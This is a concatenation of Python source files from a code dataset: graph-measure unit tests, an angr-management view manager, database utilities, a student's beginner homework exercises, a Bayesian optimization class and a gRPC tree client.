*\nimport numpy as np\n\nclass TestTriangles(unittest.TestCase):\n def test_graphBD(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0,1,0],[1,0,0,1],[0,1,0,1],[0,0,0,0]])\n graph_bd = GraphBD(A, measure_list[GraphBD], 'zero')\n MeasureTriangles.compute_measure(graph_bd)\n self.assertSequenceEqual(graph_bd.measure_dict[MeasureTriangles]['triangles'].tolist(),\n [1, 1, 1, 0])\n\n def test_graphBU(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0,1,0,0],[1,0,0,1,0],[0,1,0,1,0],[0,0,0,0,1],[0,0,0,1,0]])\n graph_bu = GraphBU(A, measure_list[GraphBU], 'zero', 'max')\n MeasureTriangles.compute_measure(graph_bu)\n self.assertSequenceEqual(graph_bu.measure_dict[MeasureTriangles]['triangles'].tolist(),\n [1, 2, 2, 1, 0])\n\n def test_graphWD(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0,0.1,0.8],[0.5,0,0,0.2],[0,0.1,0,0.4],[0,0,0,0]])\n graph_wd = GraphWD(A, measure_list[GraphWD], 'zero')\n MeasureTriangles.compute_measure(graph_wd)\n for i in range(len(A[0])):\n self.assertAlmostEqual(graph_wd.measure_dict[MeasureTriangles]['triangles'].tolist()[i], [0.0855, 0.0855, 0.0855, 0][i], places=4)\n\n def test_graphWU(self):\n measure_list = MeasureParser.list_measures()\n A = np.array([[0,0.5,0.1,0.8],[0.5,0,0.1,0.2],[0.1,0.1,0,0.4],[0.8,0.2,0.4,0]])\n graph_wu = GraphWU(A, measure_list[GraphWU], 'zero', 'max')\n MeasureTriangles.compute_measure(graph_wu)\n for i in range(len(A[0])):\n self.assertAlmostEqual(graph_wu.measure_dict[MeasureTriangles]['triangles'].tolist()[i], [0.9194, 0.8019, 0.6885, 0.9484][i], places=4)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_triangles.py","file_name":"test_triangles.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"86639129","text":"\nfrom collections import defaultdict\n\nfrom PySide2.QtCore import Qt\nfrom .widgets.qsmart_dockwidget import QSmartDockWidget\n\n\nclass ViewManager:\n \"\"\"\n Manages views.\n \"\"\"\n def __init__(self, workspace):\n self.workspace = workspace\n self.views = [ ]\n self.docks = [ ]\n self.view_to_dock = { }\n self.views_by_category = defaultdict(list)\n\n @property\n def main_window(self):\n return self.workspace._main_window\n\n def add_view(self, view, caption, category):\n \"\"\"\n Add a view to this workspace.\n\n :param view: The view to add.\n :param str caption: The caption of the view.\n :param str category: The category of the view.\n :return: None\n \"\"\"\n\n docking_positions = {\n 'left': Qt.LeftDockWidgetArea,\n 'right': Qt.RightDockWidgetArea,\n 'top': Qt.TopDockWidgetArea,\n 'bottom': Qt.BottomDockWidgetArea,\n }\n\n self.views_by_category[category].append(view)\n\n dock = QSmartDockWidget(caption, parent=view)\n dock_area = docking_positions.get(view.default_docking_position, Qt.RightDockWidgetArea)\n if view.default_docking_position == 'right':\n self.main_window.central_widget.addDockWidget(dock_area, dock)\n retab = True\n else:\n self.main_window.addDockWidget(dock_area, dock)\n retab = False\n dock.setWidget(view)\n\n self.views.append(view)\n self.docks.append(dock)\n self.view_to_dock[view] = dock\n\n if retab:\n self.tabify_right_views()\n\n def raise_view(self, view):\n \"\"\"\n Find the dock widget of a view, and then bring that dock widget to front.\n\n :param BaseView view: The view to raise.\n :return: None\n \"\"\"\n\n # find the dock widget by the view\n dock = self.view_to_dock.get(view, None)\n if dock is None:\n return\n\n dock.raise_()\n\n def first_view_in_category(self, category):\n \"\"\"\n Return the first view in a specific category.\n\n :param str category: The category of the view.\n :return: The view.\n \"\"\"\n\n if self.views_by_category[category]:\n return self.views_by_category[category][0]\n return None\n\n def tabify_right_views(self):\n \"\"\"\n Tabify all right-side dockable views.\n\n :return: None\n \"\"\"\n\n right_dockable_views = [dock for dock in self.docks\n if dock.widget().default_docking_position == 'right']\n\n for d0, d1 in zip(right_dockable_views, right_dockable_views[1:]):\n self.workspace._main_window.central_widget.tabifyDockWidget(d0, d1)\n right_dockable_views[0].raise_()\n","sub_path":"angrmanagement/ui/view_manager.py","file_name":"view_manager.py","file_ext":"py","file_size_in_byte":2857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69110761","text":"import configparser\nfrom datetime import datetime\nfrom ors.script import converter\nimport pytz\n\ndef read_config():\n config_file_path = 'conf/ors.conf'\n config_object = configparser.ConfigParser()\n config_object.read(config_file_path, 'utf-8')\n return config_object\n\ndef datetime_now():\n return datetime.now(pytz.timezone('UTC'))\n\ndef datetime_now_str():\n return datetime.now(pytz.timezone('UTC')).strftime('%Y-%m-%d %H:%M:%S')\n\ndef get_beatmap_info(beatmap_md5, mode):\n from ors.script.database import Database\n database = Database()\n connection = database.get_connection()\n result = database.execute_statement(connection, 'm_beatmaps_S01', beatmap_md5)\n count = result[0]\n if count == 0:\n from ors.script.ripple_api import RippleApi\n ripple_api = RippleApi()\n beatmap_info = ripple_api.get_beatmap_info(beatmap_md5, mode)\n beatmap_info = converter.convert_beatmap_peppy(beatmap_info[0])\n result = database.execute_statement_values(connection, 'm_beatmaps_I01', beatmap_info.values())\n connection.commit()\n connection.close()\n return beatmap_info\n else:\n return result[1][0]\n\ndef count_up_api_request():\n from ors.script.database import Database\n from ors.script import util\n database = Database()\n connection = database.get_connection()\n now = util.datetime_now_str()\n result = database.execute_statement(connection, 's_api_request_count_tick_S01', now)\n is_exists = result[0]\n if is_exists == 0:\n result = database.execute_statement(connection, 's_api_request_count_tick_I01', now)\n else:\n count = result[1][0]['count']\n count = count + 1\n result = database.execute_statement(connection, 's_api_request_count_tick_U01', count, now)\n connection.commit()\n connection.close()\n","sub_path":"ors/script/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"463437735","text":"'''\nCreated on 2020/07/10\n\n@author: ukai\n'''\nimport os\nimport unittest\n\nfrom agent import Agent\nfrom build_parameter import BuildParameter\nfrom build_parameter_factory import BuildParameterFactory\nfrom store import Store\nfrom store_field import StoreField\n\n\nclass Test(unittest.TestCase):\n \n @classmethod\n def setUpClass(cls):\n super(Test, cls).setUpClass()\n cls.dbPath = \"testDb.sqlite\"\n if os.path.exists(cls.dbPath):\n os.remove(cls.dbPath)\n\n\n @classmethod\n def tearDownClass(cls):\n super(Test, cls).tearDownClass()\n if os.path.exists(cls.dbPath):\n os.remove(cls.dbPath)\n\n \n def setUp(self):\n unittest.TestCase.setUp(self)\n \n\n def test001(self):\n \n buildParameter = BuildParameter()\n buildParameterMemento = buildParameter.createMemento()\n \n buildParameterFactory = BuildParameterFactory()\n buildParameterAnother = buildParameterFactory.create()\n \n assert buildParameter.__dict__ != buildParameterAnother.__dict__\n \n buildParameterAnother.loadMemento(buildParameterMemento)\n \n assert buildParameter.__dict__ == buildParameterAnother.__dict__\n \n def test002(self):\n \n store = Store(self.dbPath)\n assert isinstance(store, Store)\n \n for k1 in range(2**3):\n buildParameter = BuildParameter(label = \"test\" + str(k1))\n agent = Agent()\n\n for epoch in range(2**4): \n \n agentMemento = agent.createMemento()\n buildParameterMemento = buildParameter.createMemento()\n buildParameterKey = buildParameter.key \n buildParameterLabel = buildParameter.label\n \n storeField = StoreField(agentMemento, epoch, buildParameterMemento, buildParameterKey, buildParameterLabel)\n assert isinstance(storeField, StoreField)\n \n store.append(storeField)\n\n store.update_db()\n \n for storeField in store.restore(\"test%\", 1):\n assert isinstance(storeField, StoreField)\n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.test001']\n unittest.main()","sub_path":"framework/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"232697712","text":"# coding: utf8\nfrom django.urls import path\nfrom .v1 import views as views_v1\n\n\"\"\"\n Location model API v1 URLs\n\"\"\"\nurlpatterns_v1_locations = ([\n path('',\n views_v1.LocationListCreateView.as_view(),\n name='v1_list_create_location'),\n path('',\n views_v1.LocationDetailView.as_view(),\n name='v1_detail_location'),\n ], 'locations')\n\n\n\"\"\"\n Station model API v1 URLs\n\"\"\"\nurlpatterns_v1_stations = ([\n path('',\n views_v1.StationListCreateView.as_view(),\n name='v1_list_create_station'),\n path('',\n views_v1.StationDetailView.as_view(),\n name='v1_detail_station'),\n ], 'stations')\n\n","sub_path":"apps/stations/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"383218464","text":"#soc01hw\r\n\r\n#A Few Things to Try\r\n#1 Write a program that tells you the following:\r\n#How many hours are in a year?\r\ndef isleapyear(year):\r\n if year % 4 == 0 and (year % 100 != 0 or year % 400 == 0):\r\n return True\r\n return False\r\nyear =int(input('Enter a year:'))\r\nif isleapyear(year):\r\n print(f\"There are {366*24} hours in year {year}.\")\r\nelse:\r\n print(f'There are {365*24} hours in year {year}.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#- Minutes in a decade. How many minutes are in a decade?\r\nprint(f'There are {10*365*24*60} in a decade.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n#- Your age in seconds. How many seconds old are you? (I'm not going to check your answer, so be as accurate—or not—as you want.)\r\nprint(f'I am {40*365*24*60*60} seconds old.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n#- Andreea Visanoiu​: I'm 48618000 seconds old hahaha. Calculate @Andreea Visanoiu's age.\r\nprint(f'Andreea Visanoiu is {48618000/(365*24*60*60)} years old.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Here are some tougher questions: - How many days does it take for a 32-bit system to timeout, if it has a bug with integer overflow?\r\nprint(f'It takes {pow(2,32)/(24*60*60*1000)} days for a 32-bit system to timeout.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#How about a 64-bit system?\r\nprint(f'It takes {pow(2,64)/(24*60*60*1000)} days for a 64-bit system to timeout.')\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Calculate your age accurately based on your birthday (maybe use time of day e.g. 8:23am\r\n#if you know it, use 12:00 noon midday) - you will need Python modules.\r\n\r\nimport datetime\r\ndelta = datetime.datetime.now()-datetime.datetime(1980, 7, 6, 12, 0)\r\nprint (f'My exact age is {delta.days} days and {delta.seconds} seconds')\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a program that asks for a person’s first name, then middle, and then last. \r\n#Finally, it should greet the person using their full name.\r\n\r\nfirstname = input(\"Enter your first name please:\")\r\nmiddlename = input(\"Enter your first name please:\")\r\nlastname = input(\"Enter your first name please:\")\r\nprint(f\"Hello {firstname} {middlename} {lastname}. It was nice meeting you!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Write a program that asks for a person’s favorite number. Have your program add 1 to the\r\n# number, and then suggest the result as a bigger and better favorite number. \r\n# (Do be tactful about it, though.)\r\n\r\nnum = input(\"Enter your favorite number: \")\r\ntry:\r\n val = int(num)\r\n print(f\"A better number is: {val+1}\")\r\nexcept ValueError:\r\n print(\"Please enter a number!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Write an angry boss program that rudely asks what you want. Whatever you answer, the angry\r\n#boss should yell it back to you and then fire you. For example, if you type in I want\r\n#a raise, it should yell back like this: 'WHADDAYA MEAN \"I WANT A RAISE\"?!? YOU'RE FIRED!!'\r\n\r\n\r\nquestion = input(\"What do you want?\")\r\nprint(f\"\\'WHADDAYA MEAN \\\"{question.upper()}\\\"?!? YOU'RE FIRED!!\\'\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Here’s something for you to do in order to play around more with center, ljust, and rjust: \r\n#write a program that will display a table of contents (see day3.md to review the format)\r\n\r\nprint(\"Table of Contents\")\r\nprint(\"\")\r\nprint(\"Chapter 1: Getting Started\".ljust(30,\" \")+\"page 1\".ljust(20,\" \"))\r\nprint(\"Chapter 2: Numbers\".ljust(30,\" \")+\"page 9\".ljust(20,\" \"))\r\nprint(\"Chapter 3: Letters\".ljust(30,\" \")+\"page 13\".ljust(20,\" \"))\r\n\r\nx=input (\"Press any key to next homework\")\r\n\r\n#Write a program that prints out the lyrics to that beloved classic, “99 Bottles of Beer on the Wall.”\r\n\r\ni = 99\r\nwhile i>0:\r\n print(f'{i} bottles of beer on the wall, {i} bottles of beer.')\r\n i=i-1\r\n if i>0:\r\n print(f'Take one down and pass it around, {i} bottles of beer on the wall.')\r\n else:\r\n print('Take one down and pass it around, no more bottles of beer on the wall.')\r\n print(\" \")\r\nprint(\"No more bottles of beer on the wall, no more bottles of beer.\") \r\nprint(\"Go to the store and buy some more, 99 bottles of beer on the wall.\")\r\n \r\nx=input (\"Press any key to next homework\")\r\n\r\n#Whatever you say to Grandma (whatever you type in), she should respond with this: \r\n#HUH?! SPEAK UP, GIRL! unless you shout it (type in all capitals). \r\n#If you shout, she can hear you (or at least she thinks so) and yells back: \r\n#NO, NOT SINCE 1938! \r\n#To make your program really believable, have Grandma shout a different year each time, maybe\r\n# any year at random between 1930 and 1950.\r\n#You can’t stop talking to Grandma until you shout BYE. \r\n\r\nimport random\r\nphrase = \" \"\r\nwhile phrase !=\"BYE\":\r\n phrase = input(\"Tell something to grandma?\")\r\n if phrase == \"BYE\":\r\n break\r\n if phrase.isupper() !=True:\r\n \t\tprint(\"HUH?! SPEAK UP, GIRL!\")\r\n else:\r\n \t\tyear = random.randrange(1930, 1950, 1)\r\n \t\tprint(f\"NO, NOT SINCE {year}!\")\r\nprint(\"Goodbye!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#What if Grandma doesn’t want you to leave? When you shout BYE, she could pretend not to hear you. \r\n#Change your previous program so that you have to shout BYE three times in a row. Make sure to test your program: \r\n#if you shout BYE three times but not in a row, you should still be talking to Grandma.\r\n\r\nimport random\r\nphrase = \" \"\r\n#counter counts consequitive \"BYE\" phrases\r\ncounter = 0\r\n#exit controls the while loop. \r\nexit = 0\r\nwhile exit !=1:\r\n phrase = input(\"Tell something to grandma?\")\r\n if (phrase == \"BYE\") and (counter == 2):\r\n break\r\n elif phrase == \"BYE\":\r\n counter=counter +1\r\n else:\r\n counter=0\r\n if phrase.isupper() !=True:\r\n \t\tprint(\"HUH?! SPEAK UP, GIRL!\")\r\n else:\r\n \t\tyear = random.randrange(1930, 1950, 1)\r\n \t\tprint(f\"NO, NOT SINCE {year}!\")\r\nprint(\"Goodbye!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a program that asks for a starting year and an ending year and then puts all the leap years \r\n#between them (and including them, if they are also leap years). Leap years are years divisible by \r\n#4 (like 1984 and 2004). However, years divisible by 100 are not leap years (such as 1800 and 1900) \r\n#unless they are also divisible by 400 (such as 1600 and 2000, which were in fact leap years). What a mess!\r\n\r\nstartyear = int(input(\"Enter starting year:\"))\r\nendyear = int(input(\"Enter ending year:\"))\r\ndef leapyr(n):\r\n\t#divisible by for and not divisible by 100 or divisible by 4 and divisible by 400\r\n if (n%4==0 and n%100!=0) or (n%4==0 and n%400==0):\r\n print (f\"{n} is a leap year.\")\r\n\r\nfor year in range(startyear, endyear+1):\r\n leapyr(year)\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Go for a walk, look around the park, try to count something. Anything! \r\n#And write a program about it. e.g. number of stairs, steps, windows, leaves estimated \r\n#in the park, kids, dogs, estimate your books by bookshelf, toiletries, wardrobe.\r\n\r\nprintf(f\"Number of stairs is {3*10*2}\")\r\n\r\n#Write the program that asks us to type as many words as we want (one word per line, continuing \r\n#until we just press Enter on an empty line) and then repeats the words back to us in alphabetical order. \r\n#Make sure to test your program thoroughly; for example, does hitting Enter on an empty line always exit your program? \r\n#Even on the first line? And the second? Hint: There’s a lovely array method that will give you a sorted version of \r\n#an array: sorted(). Use it!\r\narray = []\r\nwhile True:\r\n word = input(\"Enter a word please:\")\r\n if len(word)==0:\r\n break\r\n else:\r\n array.append(word)\r\nprint(sorted(array))\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a table of contents program here. Start the program with a list holding all of the information for your \r\n#table of contents (chapter names, page numbers, and so on). Then print out the information from the list in a \r\n#beautifully formatted table of contents. Use string formatting such as left align, right align, center.\r\n\r\nlist = [\"Table of Contents\",\"Chapter 1: Getting Started\",\"page 1\", \"Chapter 2: Numbers\",\"page 9\",\"Chapter 3: Letters\",\"page 13\"]\r\n\r\nprint(list[0])\r\nprint(\"\")\r\nprint(list[1].ljust(30,\" \")+list[2].ljust(20,\" \"))\r\nprint(list[3].ljust(30,\" \")+list[4].ljust(20,\" \"))\r\nprint(list[5].ljust(30,\" \")+list[6].ljust(20,\" \"))\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a function that prints out \"moo\" n times.\r\ndef moo(n):\r\n for i in range(n):\r\n print(\"moo\")\r\nnumber=input(\"Enter the number of times moo is printed:\")\r\nif number<=0:\r\n print(\"You did not enter a positive integer!\")\r\nelse:\r\n try:\r\n val = int(number)\r\n moo(val)\r\n except ValueError:\r\n print(\"You did not enter an integer!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Write a method that when passed an integer between 1 and 3000 (or so) returns a string containing the proper old-school \r\n#Roman numeral. In other words, old_roman_numeral 4 should return 'IIII'. Make sure to test your method on a bunch of \r\n#different numbers. Hint: Use the integer division and modulus methods. For reference, these are the values of the letters \r\n#used: I = 1 V = 5 X = 10 L = 50 C = 100 D = 500 M = 1000\r\ndef roman(n):\r\n romanlit =\"\"\r\n while n!=0:\r\n if n>=1000:\r\n romanlit = romanlit + (n//1000)*\"M\"\r\n n=n-1000*(n//1000)\r\n elif n>=500:\r\n romanlit = romanlit + (n//500)*\"D\"\r\n n=n-500*(n//500)\r\n elif n>=100:\r\n romanlit = romanlit + (n//100)*\"C\"\r\n n=n-100*(n//100)\r\n elif n>=50:\r\n romanlit = romanlit + (n//50)*\"L\"\r\n n=n-50*(n//50)\r\n elif n>=10:\r\n romanlit = romanlit + (n//10)*\"X\"\r\n n=n-10*(n//10)\r\n elif n>=5:\r\n romanlit = romanlit + (n//5)*\"V\"\r\n n=n-5*(n//5)\r\n else:\r\n romanlit = romanlit + (n)*\"I\"\r\n n=n-1*(n//1)\r\n\r\n return romanlit\r\n\r\nnumber=int(input(\"Enter a number:\"))\r\nif number<=0:\r\n print(\"You did not enter a positive integer!\")\r\nelse:\r\n try:\r\n val = int(number)\r\n print(f\"Roman numeral for this number is: {roman(val)}\")\r\n except ValueError:\r\n print(\"You did not enter an integer!\")\r\n\r\nx=input (\"Press any key to next homework\")\r\n#Eventually, someone thought it would be terribly clever if putting a smaller number before a larger one meant you had to \r\n#subtract the smaller one. As a result of this development, you must now suffer. Rewrite your previous method to return the \r\n#new-style Roman numerals so when someone calls roman_numeral 4, it should return 'IV', 90 should be 'XC' etc.\r\ndef roman(n):\r\n romanlit =\"\"\r\n while n!=0:\r\n if n>=1000:\r\n romanlit = romanlit + (n//1000)*\"M\"\r\n n=n-1000*(n//1000)\r\n elif n>=900:\r\n romanlit = romanlit + (n//500)*\"CM\"\r\n n=n-900*(n//900)\r\n elif n>=500:\r\n romanlit = romanlit + (n//500)*\"D\"\r\n n=n-500*(n//500)\r\n elif n>=400:\r\n romanlit = romanlit + (n//400)*\"CD\"\r\n n=n-400*(n//400)\r\n elif n>=100:\r\n romanlit = romanlit + (n//100)*\"C\"\r\n n=n-100*(n//100)\r\n elif n>=90:\r\n romanlit = romanlit + (n//90)*\"XC\"\r\n n=n-90*(n//90)\r\n elif n>=50:\r\n romanlit = romanlit + (n//50)*\"L\"\r\n n=n-50*(n//50)\r\n elif n>=40:\r\n romanlit = romanlit + (n//50)*\"XL\"\r\n n=n-40*(n//40) \r\n elif n>=10:\r\n romanlit = romanlit + (n//10)*\"X\"\r\n n=n-10*(n//10)\r\n elif n>=9:\r\n romanlit = romanlit + (n//9)*\"IX\"\r\n n=n-9*(n//9) \r\n elif n>=5:\r\n romanlit = romanlit + (n//5)*\"V\"\r\n n=n-5*(n//5)\r\n elif n>=4:\r\n romanlit = romanlit + (n//4)*\"IV\"\r\n n=n-4*(n//4) \r\n else:\r\n romanlit = romanlit + (n)*\"I\"\r\n n=n-1*(n//1)\r\n\r\n return romanlit\r\n\r\nnumber=int(input(\"Enter a number:\"))\r\nif number<=0:\r\n print(\"You did not enter a positive integer!\")\r\nelse:\r\n try:\r\n val = int(number)\r\n print(f\"Roman numeral for this number is: {roman(val)}\")\r\n except ValueError:\r\n print(\"You did not enter an integer!\")\r\n\r\nx=input (\"End of homework for week 1. Thanks for reviewing!\")","sub_path":"summer-of-code/week-01/wk1-homework-submissions/soc01hw-Ana-Sustic.py","file_name":"soc01hw-Ana-Sustic.py","file_ext":"py","file_size_in_byte":11982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"495065439","text":"import gpflow\nimport numpy as np\nimport sys,os\nsys.path.insert(0, os.path.join(sys.path[0], '..'))\nfrom tfbo.utils.import_modules import import_attr\nfrom tfbo.optimizers.optimizer_class import optimizer\nfrom tfbo.components.initializations import initialize_m_models\nfrom tfbo.components.block_diag_initializations import block_diag_initialize_acquisition\nfrom tfbo.components.block_diag_initializations import bloc_diag_initialize_models\nfrom tfbo.models.gplvm_models import Ort_NN\nfrom scipy.optimize import minimize\nfrom scipy.stats import norm\n\n\nclass NN_bo_optimizer(optimizer):\n def __init__(self, xy_start, proj_dim, objective, loss, **kwargs):\n super().__init__(xy_start, proj_dim, objective, loss)\n # self.initialize_normalization()\n self.initialize_probit()\n self.identity = False\n self.Mo_dim = int(3)\n self.decomposition = [list(np.arange(start=i*self.Mo_dim, stop=(i+1)*self.Mo_dim, step=1)) for i in\n range(int(np.floor(self.input_dim/self.Mo_dim)))]\n self.Xnn = None\n self.latent_bound = []\n self.latent_grid = []\n\n\n def initialize_modelM(self):\n\n nn = Ort_NN(dims=[self.Xprobit.shape[1], 20, self.proj_dim], N=0, proj_dim=0,\n name=None)\n\n k_list, gp_nnjoint = bloc_diag_initialize_models(x=np.copy(self.Xprobit), y=np.copy(self.Ynorm),\n input_dim=self.proj_dim,\n model='joint',\n kernel='Matern52',\n ARD=True,\n nn=nn,\n decomp=self.decomposition) # last kernel is the Y kernel\n\n # k2_list, gp_nnjoint_test = initialize_m_models(x=np.copy(self.Xprobit), y=np.copy(self.Ynorm),\n # input_dim=self.proj_dim,\n # model='joint',\n # kernel='Matern52',\n # ARD=True,\n # nn=nn,\n # decomp=self.decomposition) # last kernel is the Y kernel\n\n gp_nnjoint.likelihood.variance = 1e-06 # 0.001\n # gp_nnjoint_test.likelihood.variance = 1e-06\n\n return k_list, gp_nnjoint, nn\n\n\n def generate_x(self, x_proj, gp_joint):\n\n # mean_new = gp_joint.predict_x(x_proj)\n mean_new, post_cov = gp_joint.predict_x(x_proj)\n joint_new = np.zeros(shape=[1, self.Xprobit.shape[1]])\n joint_var = np.zeros(shape=[1, self.Xprobit.shape[1]])\n for decomp_jj, jj in zip(self.decomposition, list(range(len(self.decomposition)))):\n joint_new[:, decomp_jj] = np.copy(mean_new[jj, :, 0])\n joint_var[:, decomp_jj] = np.copy(np.diag(post_cov[jj, :, :]))\n\n joint_var = np.clip(np.abs(joint_var), a_min=1e-06, a_max=1e09)\n m = 0.\n v = 1.\n z = (joint_new - m) / (v * np.sqrt(1. + joint_var / (v ** 2.))) # Equation (3.82) GPML book = Equation (3.25) GPML book\n x_out = norm.cdf(z)\n if np.isnan(x_out.max()):\n print('joint_new')\n print(joint_new)\n print('joint_var')\n print(joint_var)\n print('z')\n print(z)\n print('mean_new')\n print(mean_new)\n print('post_cov')\n print(post_cov)\n print('x_out')\n print(x_out)\n print('alpha_reshape')\n # x_new = (joint_new * self.X_std) + self.X_mean # originally mapped to Xnorm\n # x_out = np.clip(x_out, a_min=0., a_max=1.)\n return x_out\n\n\n def update_latent_bounds(self, opt_config):\n m_min = np.clip(np.min(self.Xnn, axis=0, keepdims=True) - 0.2, a_min=0., a_max=1.) # refined\n m_max = np.clip(np.max(self.Xnn, axis=0, keepdims=True) + 0.2, a_min=0., a_max=1.)\n self.latent_bound = []\n for i in range(self.proj_dim):\n self.latent_bound += [(m_min[0, i].copy(), m_max[0, i].copy())]\n # # uncomment if want to use L-BFGS-B with bounds on the optimization variable\n opt_config['bounds'] = self.latent_bound * self.num_init\n\n self.latent_grid = np.multiply(np.copy(self.grid), m_max - m_min) + m_min\n return opt_config\n\n\n def run(self, maxiters=20):\n opt_config = import_attr('tfbo/configurations', attribute='acquisition_opt') # check import configuration\n for j in range(maxiters):\n print('iteration: ', j)\n\n self.reset_graph()\n # initialize model\n k_list, gp_nnjoint, nn = self.initialize_modelM()\n try:\n gpflow.train.ScipyOptimizer().minimize(gp_nnjoint)\n except:\n try:\n gp_nnjoint.likelihood.variance = 1e-03\n gpflow.train.ScipyOptimizer().minimize(gp_nnjoint)\n except:\n print('Failure in optimization of hyper-parameters, reset to standard ones')\n\n Xnn = gp_nnjoint.nn.np_forward(self.Xprobit)\n self.Xnn = Xnn\n self.hyps.append(self.get_hyps(gp_nnjoint))\n\n # optimize the acquisition function within bounds\n kwargs = {'ymin': self.Ynorm.min()}\n acquisition = block_diag_initialize_acquisition(loss=self.loss, gpmodel=gp_nnjoint, **kwargs)\n opt_config = self.update_latent_bounds(opt_config)\n x_proj_tp1, acq_tp1 = self.minimize_acquisition(acquisition, opt_config)\n\n x_tp1 = self.generate_x(x_proj_tp1, gp_nnjoint)\n\n y_tp1 = self.evaluate(x_tp1)\n self.update_data(x_tp1, y_tp1)\n lik = []\n\n return self.data_x, self.data_y, self.hyps, lik\n\n def minimize_acquisition(self, acquisition, opt_config):\n\n acquisition_grid, acq_sum, acq_grad = acquisition(self.latent_grid)\n indices_sorted = np.argsort(acquisition_grid, axis=0)\n x_topk = np.ravel(np.copy(self.latent_grid[indices_sorted[:self.num_init, 0], :]))\n\n def acq_objective(self, xopt, acquisition):\n xopt_reshape = np.reshape(xopt, [self.num_init, self.proj_dim])\n acq_arr, acq_sum, acq_grad = acquisition(xopt_reshape)\n grad_reshape = np.ravel(acq_grad[0]) # check shape\n return acq_sum[0, 0], grad_reshape\n sum_acquisition_opt = lambda x: acq_objective(self=self, xopt=x, acquisition=acquisition)\n optimize_result = minimize(sum_acquisition_opt, x_topk, **opt_config)\n\n x_opt_all = np.reshape(optimize_result.x, newshape=[self.num_init, self.proj_dim])\n f_opt_all, f_sum, f_grad = acquisition(x_opt_all)\n x_opt = x_opt_all[f_opt_all.argmin(), :][None]\n f_opt = f_opt_all.min()[None, None]\n return x_opt, f_opt\n\n def evaluate(self, x_tp1):\n return self.objective.f(x_tp1, noisy=True, fulldim=self.identity)\n\n def update_data(self, x_new, y_new):\n self.data_x = np.concatenate([self.data_x, x_new], axis=0) # check shapes\n self.data_y = np.concatenate([self.data_y, y_new], axis=0)\n # self.initialize_normalization()\n self.initialize_probit()\n\n def get_hyps(self, gp):\n lengthscales = gp.kern.kernels[-1].lengthscales.read_value()\n kern_var = gp.kern.kernels[-1].variance.read_value()[None]\n noise_var = gp.likelihood.variance.read_value()[None]\n return np.concatenate([lengthscales, kern_var, noise_var], axis=0)","sub_path":"tfbo/optimizers/NN_bo_optimizer.py","file_name":"NN_bo_optimizer.py","file_ext":"py","file_size_in_byte":7693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262007729","text":"from __future__ import print_function\nimport logging\nimport threading\n\nimport grpc\n\nfrom tree import Tree\nimport rpc_package.tree_pb2 as server\nfrom rpc_package.tree_pb2 import *\nfrom rpc_package.tree_pb2_grpc import TreeServiceStub\n\nCHANNEL = \"localhost:50000\"\n\n# This is the tree client object !!!!!!!\nclass treeClient():\n\n def __init__(self, name, channel):\n self._name = name\n self._channel = channel = grpc.insecure_channel(channel)\n self._stub = TreeServiceStub(channel)\n self._tree = Tree(0.4)\n threading.Thread(target=self.__listening_for_requests, daemon=True).start()\n\n def __listening_for_requests(self):\n for reply in self._stub.Stream(server.Empty()):\n print(reply.message)\n print(\"Recieved request from server! target client: \"+reply.client)\n if self._name == reply.client:\n print(\"Processing...\")\n # check if should add new item node\n if reply.addNewItem:\n # client tree has a dummy root\n newNode = self._tree._addNode(self._tree._root, reply.trx[0])\n # directly insert from the item node\n self._tree.insertAndRecord(self._tree._root._children[reply.trx[0]],reply.trx[1:])\n else:\n print(\"Ignored.\")\n print(f\"Tree at client {self._name}: \", self._tree)\n\n def send_request(self, trx):\n if trx:\n request = rootAddRequest(client=self._name,trx=trx,message=\"This is \"+self._name+\" requesting adding trx to server.\")\n reply = self._stub.add_note_root(request)\n\n # for trx, msg in reply.message.items():\n # if msg[:6] == \"Append\":\n # self._tree.insert(self._tree._root,trx)\n # print(self._tree)\n # print(\"Add {}, current size {}\".format(trx, self._tree._size))\n # else:\n # print(self._tree)\n # print(\"Reroute to client {}\".format(msg[19:]))\n\n\n\ndef run():\n # Tree service client is here !!!!!!\n channel = CHANNEL\n client_name = str(input(\"Please type your client name here: \"))\n c = treeClient(client_name, channel)\n while True:\n client_input = str(input(\"The transaction you wanna add here (e.g. 'ABCD'): \"))\n c.send_request(client_input)\n\n\n\n\nif __name__ == \"__main__\":\n logging.basicConfig()\n run()\n","sub_path":"gRPC/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 